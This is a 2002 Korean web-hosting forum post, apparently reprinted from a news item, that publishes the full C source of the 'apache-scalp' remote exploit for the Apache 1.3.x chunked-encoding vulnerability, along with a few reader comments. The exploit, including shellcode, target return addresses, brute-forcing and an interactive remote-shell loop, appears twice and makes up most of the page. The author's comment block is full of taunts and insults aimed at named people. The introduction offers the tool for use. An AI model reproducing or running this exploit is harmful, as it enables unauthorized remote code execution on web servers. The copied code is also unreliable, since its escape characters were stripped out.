웹마스터 팁
page_full_width" class="col-xs-12" |cond="$__Context->page_full_width">
[보안] 아파치 1.3.x 공격툴 공개되다...06/24
2002.06.28 14:22
[보안] 아파치 1.3.x 공격툴 공개되다...06/24
취약점 제목 :
아파치 1.3.x 원격 공격툴
발표날짜 :
2002.06.20
문제점 :
아파치 1.3.x 에서 치명적인 취약점이 있음이 발견되었다.
이 소스코드는 해킹 커뮤니티를 위해서 제작이 되었으며 썰렁한 아이템들 가지고 자신들의 배속만 챙기는 보안기업들은 사용을 삼가해 주시기 바란다.
이번에 발견된 버그는 "chunking" 취약점이라고도 불리우며 공격용 소스는 OpenBSD 에서만 작동된다.
x86/*nix 에서 왜 작동이 안되냐고 항의하는 고수들을 위해서 소스를 약간 수정하였다.
잘 사용하시길 기원하며...
공격법 / 공격용 소스코드 :
/*
* apache-scalp.c
* OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
*
* ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
*
* BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
*
* ". . . and Doug Sniff said it was a hole in Epic."
*
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
*
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
*
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
*
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
*
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
*
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes the
* exploitation possible.
*
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
*
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
*
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
*
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
*
* Testbeds: synnergy.net, monkey.org, 9mm.com
*
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
*
* [#!GOBBLES QUOTES]
*
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
*
* xxxx this thing is a major exploit. do you really wanna publish it?
* oooo i'm not afraid of whitehats
* xxxx the blackhats will kill you for posting that exploit
* oooo blackhats are a myth
* oooo so i'm not worried
* oooo i've never seen one
* oooo i guess it's sort of like having god in your life
* oooo i don't believe there's a god
* oooo but if i sat down and met him
* oooo i wouldn't walk away thinking
* oooo "that was one hell of a special effect"
* oooo so i suppose there very well could be a blackhat somewhere
* oooo but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
*
* [GOBBLES POSERS/WANNABES]
*
* --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
* --- super@GOBBLES.NET (low-level.net)
*
* GOBBLES Security
* GOBBLES@hushmail.com
* http://www.bugtraq.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =
"x89xe2x83xecx10x6ax10x54x52x6ax00x6ax00xb8x1f"
"x00x00x00xcdx80x80x7ax01x02x75x0bx66x81x7ax02"
"x42x41x75x03xebx0fx90xffx44x24x04x81x7cx24x04"
"x00x01x00x00x75xdaxc7x44x24x08x00x00x00x00xb8"
"x5ax00x00x00xcdx80xffx44x24x08x83x7cx24x08x03"
"x75xeex68x0bx6fx6bx0bx81x34x24x01x00x00x01x89"
"xe2x6ax04x52x6ax01x6ax00xb8x04x00x00x00xcdx80"
"x68x2fx73x68x00x68x2fx62x69x6ex89xe2x31xc0x50"
"x52x89xe1x50x51x52x50xb8x3bx00x00x00xcdx80xcc";
struct {
char *type;
u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f },
{ "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa },
{ "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae },
};
int main(int argc, char *argv[]) {
char *hostp, *portp;
unsigned char buf[512], *expbuf, *p;
int i, j, lport;
int sock;
int bruteforce, owned, progress;
u_long retaddr;
struct sockaddr_in sin, from;
if(argc != 3) {
printf("Usage: %s <target#|base address> <ip[:port]>n", argv[0]);
printf(" Using targets:t./apache-scalp 3 127.0.0.1:8080n");
printf(" Using bruteforce:t./apache-scalp 0x8f000 127.0.0.1:8080n");
printf("n--- --- - Potential targets list - --- ----n");
printf("Target ID / Target specificationn");
for(i = 0; i < sizeof(targets)/8; i++)
printf("t%d / %sn", i, targets[i].type);
return -1;
}
hostp = strtok(argv[2], ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
retaddr = strtoul(argv[1], NULL, 16);
if(retaddr < sizeof(targets)/8) {
retaddr = targets[retaddr].retaddr;
bruteforce = 0;
}
else
bruteforce = 1;
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
i = retaddr & 0xff;
if(i == 0x0a || i == 0x0d)
retaddr++;
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
continue;
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(hostp);
sin.sin_port = htons(atoi(portp));
if(!progress)
printf("n[*] Connecting.. ");
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror("connect()");
exit(1);
}
if(!progress)
printf("connected!n");
/* Setup the local port in our shellcode */
i = sizeof(from);
if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
perror("getsockname()");
exit(1);
}
lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));
PUT_STRING("GET / HTTP/1.1rnHost: apache-scalp.crn");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("rn");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}
PUT_BYTES(REP_ZERO, 0);
PUT_STRING("rn");
}
PUT_STRING("Transfer-Encoding: chunkedrn");
snprintf(buf, sizeof(buf) - 1, "rn%xrn", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "rn%xrn", MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, "r[*] Currently using retaddr 0x%lx, length %u, localport %u",
retaddr, (unsigned int)(p - expbuf), lport);
memset(buf + strlen(buf), ' ', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(';');
}
else
putchar((rand()%2)? 'P': 'p');
fflush(stdout);
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
if(!owned && n >= 4 && memcmp(buf, "nokn", 4) == 0) {
printf("nGOBBLE GOBBLE!@#%%)*#n");
printf("retaddr 0x%lx did the trick!n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00tn");
write(sock, expbuf, strlen(expbuf));
owned++;
}
write(1, buf, n);
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!n");
return -1;
}
}
return 0;
}
<2002.06.24>
hackersnews 송재명기자
취약점 제목 :
아파치 1.3.x 원격 공격툴
발표날짜 :
2002.06.20
문제점 :
아파치 1.3.x 에서 치명적인 취약점이 있음이 발견되었다.
이 소스코드는 해킹 커뮤니티를 위해서 제작이 되었으며 썰렁한 아이템들 가지고 자신들의 배속만 챙기는 보안기업들은 사용을 삼가해 주시기 바란다.
이번에 발견된 버그는 "chunking" 취약점이라고도 불리우며 공격용 소스는 OpenBSD 에서만 작동된다.
x86/*nix 에서 왜 작동이 안되냐고 항의하는 고수들을 위해서 소스를 약간 수정하였다.
잘 사용하시길 기원하며...
공격법 / 공격용 소스코드 :
/*
* apache-scalp.c
* OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
*
* ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
*
* BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
*
* ". . . and Doug Sniff said it was a hole in Epic."
*
* ---
* Disarm you with a smile
* And leave you like they left me here
* To wither in denial
* The bitterness of one who's left alone
* ---
*
* Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
* the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
* their crappy memcpy implementation that makes this 32-bit impossibility
* very easy to accomplish. This vulnerability was recently rediscovered by a slew
* of researchers.
*
* The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants
* - Is only exploitable on win32 platforms
* - Is only exploitable on certain 64-bit systems
*
* However, contrary to what ISS would have you believe, we have
* successfully exploited this hole on the following operating systems:
*
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
*
* Don't get discouraged too quickly in your own research. It took us close
* to two months to be able to exploit each of the above operating systems.
* There is a peculiarity to be found for each operating system that makes the
* exploitation possible.
*
* Don't email us asking for technical help or begging for warez. We are
* busy working on many other wonderful things, including other remotely
* exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
* the community that those holes don't exist? We wonder who's paying her.
*
* This code is an early version from when we first began researching the
* vulnerability. It should spawn a shell on any unpatched OpenBSD system
* running the Apache webserver.
*
* We appreciate The Blue Boar's effort to allow us to post to his mailing
* list once again. Because he finally allowed us to post, we now have this
* very humble offering.
*
* This is a very serious vulnerability. After disclosing this exploit, we
* hope to have gained immense fame and glory.
*
* Testbeds: synnergy.net, monkey.org, 9mm.com
*
* Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
* bugs are great.
*
* [#!GOBBLES QUOTES]
*
* --- you just know 28923034839303 admins out there running
* OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
* weekend"
* --- "Five years without a remote hole in the default install". default
* package = kernel. if theo knew that talkd was exploitable, he'd cry.
* --- so funny how apache.org claims it's impossible to exploit this.
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
* --- I hope Theo doesn't kill himself
* --- heh, this is a middle finger to all those open source, anti-"m$"
* idiots... slashdot hippies...
* --- they rushed to release this exploit so they could update their ISS
* scanner to have a module for this vulnerability, but it doesnt even
* work... it's just looking for win32 apache versions
* --- no one took us seriously when we mentioned this last year. we warned
* them that moderation == no pie.
* --- now try it against synnergy :>
* --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
*
* xxxx this thing is a major exploit. do you really wanna publish it?
* oooo i'm not afraid of whitehats
* xxxx the blackhats will kill you for posting that exploit
* oooo blackhats are a myth
* oooo so i'm not worried
* oooo i've never seen one
* oooo i guess it's sort of like having god in your life
* oooo i don't believe there's a god
* oooo but if i sat down and met him
* oooo i wouldn't walk away thinking
* oooo "that was one hell of a special effect"
* oooo so i suppose there very well could be a blackhat somewhere
* oooo but i doubt it... i've seen whitehat-blackhats with their ethics
* and deep philosophy...
*
* [GOBBLES POSERS/WANNABES]
*
* --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it)
* --- super@GOBBLES.NET (low-level.net)
*
* GOBBLES Security
* GOBBLES@hushmail.com
* http://www.bugtraq.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =
"x89xe2x83xecx10x6ax10x54x52x6ax00x6ax00xb8x1f"
"x00x00x00xcdx80x80x7ax01x02x75x0bx66x81x7ax02"
"x42x41x75x03xebx0fx90xffx44x24x04x81x7cx24x04"
"x00x01x00x00x75xdaxc7x44x24x08x00x00x00x00xb8"
"x5ax00x00x00xcdx80xffx44x24x08x83x7cx24x08x03"
"x75xeex68x0bx6fx6bx0bx81x34x24x01x00x00x01x89"
"xe2x6ax04x52x6ax01x6ax00xb8x04x00x00x00xcdx80"
"x68x2fx73x68x00x68x2fx62x69x6ex89xe2x31xc0x50"
"x52x89xe1x50x51x52x50xb8x3bx00x00x00xcdx80xcc";
struct {
char *type;
u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f },
{ "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa },
{ "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 },
{ "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 },
{ "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a },
{ "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae },
};
int main(int argc, char *argv[]) {
char *hostp, *portp;
unsigned char buf[512], *expbuf, *p;
int i, j, lport;
int sock;
int bruteforce, owned, progress;
u_long retaddr;
struct sockaddr_in sin, from;
if(argc != 3) {
printf("Usage: %s <target#|base address> <ip[:port]>n", argv[0]);
printf(" Using targets:t./apache-scalp 3 127.0.0.1:8080n");
printf(" Using bruteforce:t./apache-scalp 0x8f000 127.0.0.1:8080n");
printf("n--- --- - Potential targets list - --- ----n");
printf("Target ID / Target specificationn");
for(i = 0; i < sizeof(targets)/8; i++)
printf("t%d / %sn", i, targets[i].type);
return -1;
}
hostp = strtok(argv[2], ":");
if((portp = strtok(NULL, ":")) == NULL)
portp = "80";
retaddr = strtoul(argv[1], NULL, 16);
if(retaddr < sizeof(targets)/8) {
retaddr = targets[retaddr].retaddr;
bruteforce = 0;
}
else
bruteforce = 1;
srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
i = retaddr & 0xff;
if(i == 0x0a || i == 0x0d)
retaddr++;
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
continue;
sock = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(hostp);
sin.sin_port = htons(atoi(portp));
if(!progress)
printf("n[*] Connecting.. ");
fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror("connect()");
exit(1);
}
if(!progress)
printf("connected!n");
/* Setup the local port in our shellcode */
i = sizeof(from);
if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
perror("getsockname()");
exit(1);
}
lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));
PUT_STRING("GET / HTTP/1.1rnHost: apache-scalp.crn");
for (i = 0; i < REP_SHELLCODE; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(": ");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING("rn");
}
for (i = 0; i < REP_POPULATOR; i++) {
PUT_STRING("X-");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(": ");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}
PUT_BYTES(REP_ZERO, 0);
PUT_STRING("rn");
}
PUT_STRING("Transfer-Encoding: chunkedrn");
snprintf(buf, sizeof(buf) - 1, "rn%xrn", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, "rn%xrn", MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);
write(sock, expbuf, p - expbuf);
progress++;
if((progress%70) == 0)
progress = 1;
if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, "r[*] Currently using retaddr 0x%lx, length %u, localport %u",
retaddr, (unsigned int)(p - expbuf), lport);
memset(buf + strlen(buf), ' ', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(';');
}
else
putchar((rand()%2)? 'P': 'p');
fflush(stdout);
while (1) {
fd_set fds;
int n;
struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;
if(!owned && n >= 4 && memcmp(buf, "nokn", 4) == 0) {
printf("nGOBBLE GOBBLE!@#%%)*#n");
printf("retaddr 0x%lx did the trick!n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00tn");
write(sock, expbuf, strlen(expbuf));
owned++;
}
write(1, buf, n);
}
if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);
write(sock, buf, n);
}
}
if(!owned)
break;
}
free(expbuf);
close(sock);
if(owned)
return 0;
if(!bruteforce) {
fprintf(stderr, "Ooops.. hehehe!n");
return -1;
}
}
return 0;
}
<2002.06.24>
hackersnews 송재명기자
댓글 4
-
임현
2002.06.28 20:29
-
Bro's
2002.07.14 20:17
임현님 글을 잘안읽으신듯....위에 엄연히...OpenBSD밖에안된다구 했는데... -
실버
2002.07.18 20:54
스크립트 키드들의 장난이라뇨...ㅡㅡ;;
임현님 단어에 사용이 잘못되신듯...ㅡㅡ;;;
bof를 이용한 공격툴인것 같네여.. -
차카게살자
2002.07.24 14:03
2002-07-24 14:00:33 에 차카게살자(양창민)님이 작성한 내용입니다.
원 공격툴 소스는 OpenBSD / Apache 플랫폼에만 적용되었죠.
이걸 소스수정하여 아래 다섯가지 플랫폼 모두 공격가능하다는 내용이랍니다.
* WIN32 플랫폼 모든 버젼
* Sun Solaris 6-8 (sparc/x86)
* FreeBSD 4.3-4.5 (x86)
* OpenBSD 2.6-3.1 (x86)
* Linux (GNU) 2.4 (x86)
+
Apache 1.3.20
Apache 1.3.22
Apache 1.3.23
Apache 1.3.24
제목 | 글쓴이 | 날짜 |
---|---|---|
FTP 에 사용자추가후 로그인부분 추가하기 - 로그인 부분 [2] | DearMai | 2002.08.12 |
FTP 에 사용자추가후 로그인부분 추가하기 - 사용자추가부분 [5] | DearMai | 2002.08.12 |
VMware로 윈도우에서 리눅스 설치하기 [8] | 강민 | 2002.08.05 |
IIS 해당 IP를 제외한 모든 컴퓨터 접근 금지시키기 [1] | 오픈소스 | 2002.08.04 |
http://도메인/~아이디 를 http://도메인/아이디 로 ^^ [11] | 임현 | 2002.07.31 |
솔라리스와 리눅스의 chmod 다른점 [1] | 한꼬마 | 2002.07.31 |
오랜만에 올리는 팁이군요. - 웹호스팅 쉽게해보기! - [8] | 임현 | 2002.07.28 |
[mysql] create table select , insert into select | 불티나 | 2002.07.26 |
[mysql] load data - 파일을 테이블에 넣기 [1] | 불티나 | 2002.07.26 |
ASP + MS SQL 기반 게시판 설치하기 - 두번째 | 오픈소스 | 2002.07.12 |
ASP + MS SQL 기반 게시판 설치하기 - 첫번째 | 오픈소스 | 2002.07.12 |
[펌] 후다닥 apache 랑 php 업글하기 [8] | 임현 | 2002.07.12 |
제로보드 data 폴더 일괄적으로 소유권 변경 스크립트 [2] | 라지엘 | 2002.07.01 |
[보안] 아파치 1.3.x 공격툴 공개되다...06/24 [4] | 차카게살자 | 2002.06.28 |
특정 파일(ex: mp3,avi,mpg)만 찾아서 자동으로 삭제하기! | 임현 | 2002.06.27 |
Mysql 데이타베이스 백업및 복구(2)... [5] | 이휘은 | 2002.06.22 |
Mysql 데이타베이스 백업및 복구(1)... [7] | 이휘은 | 2002.06.21 |
간단팁 서버 Info! [4] | 임현 | 2002.06.21 |
한 통 내장형 모뎀으로 인터넷하기.. [1] | i- | 2002.06.19 |
리눅스에서 최강 p2p 공유프로그램 당나귀!! 서버를 운영해보도록하자~ [7] | 임현 | 2002.06.15 |
이걸 실행시킬 쉘을 안주는경우가 많다죠?
OpenBSD 밖에안되는거 아닌가요?
별문제될것은 없다고봅니다.